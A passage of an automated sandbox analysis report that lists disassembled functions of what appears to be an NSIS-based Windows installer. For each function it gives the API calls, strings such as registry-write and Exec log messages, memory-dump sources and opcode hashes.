                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                                        • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                                                                                                                        • API String ID: 565278875-3368763019
                                                                                                                                                                                                                                                                                        • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                                        • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                                                                                                                                        Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                                        • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                                        • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                                        • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                                        • String ID: F
                                                                                                                                                                                                                                                                                        • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                                        • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                        • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                                                                                                                                        Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                                        • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                                        • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                                        • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                                        • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                                        • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                                        • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                                        • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                                        • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                                        • Opcode ID: d135351413aed0fa2e41fb55b591d9c8f09a23be57b10ac43573759c3ccf12cb
                                                                                                                                                                                                                                                                                        • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d135351413aed0fa2e41fb55b591d9c8f09a23be57b10ac43573759c3ccf12cb
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                                                                                                                                        Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                                        • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                        • API String ID: 3734993849-3206598305
                                                                                                                                                                                                                                                                                        • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                        • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                                                                                                                                        Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                                        • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                                        • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                                        • Opcode ID: 4ef21115088bf02e153ee67726e536285437d58c513b54df1b4c7782176e81a7
                                                                                                                                                                                                                                                                                        • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4ef21115088bf02e153ee67726e536285437d58c513b54df1b4c7782176e81a7
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                                                                                                                                        Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042795A,771B23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042795A,771B23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042795A,771B23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                                        • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                                        • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                                        • `G, xrefs: 0040246E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                        • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                                                                                                                                        • API String ID: 1033533793-4193110038
                                                                                                                                                                                                                                                                                        • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                                        • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                                                                                                                                        Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                                                                                                                        • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                                                                                                                        • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                                                                                                                        • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                        • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                                                                                                                                        Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042795A,771B23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042795A,771B23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042795A,771B23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                          • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                          • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                                        • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                                        • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                        • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                                        • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                                        • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                        • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                                                                                                                                        Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                                                                        • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                                                                        Strings
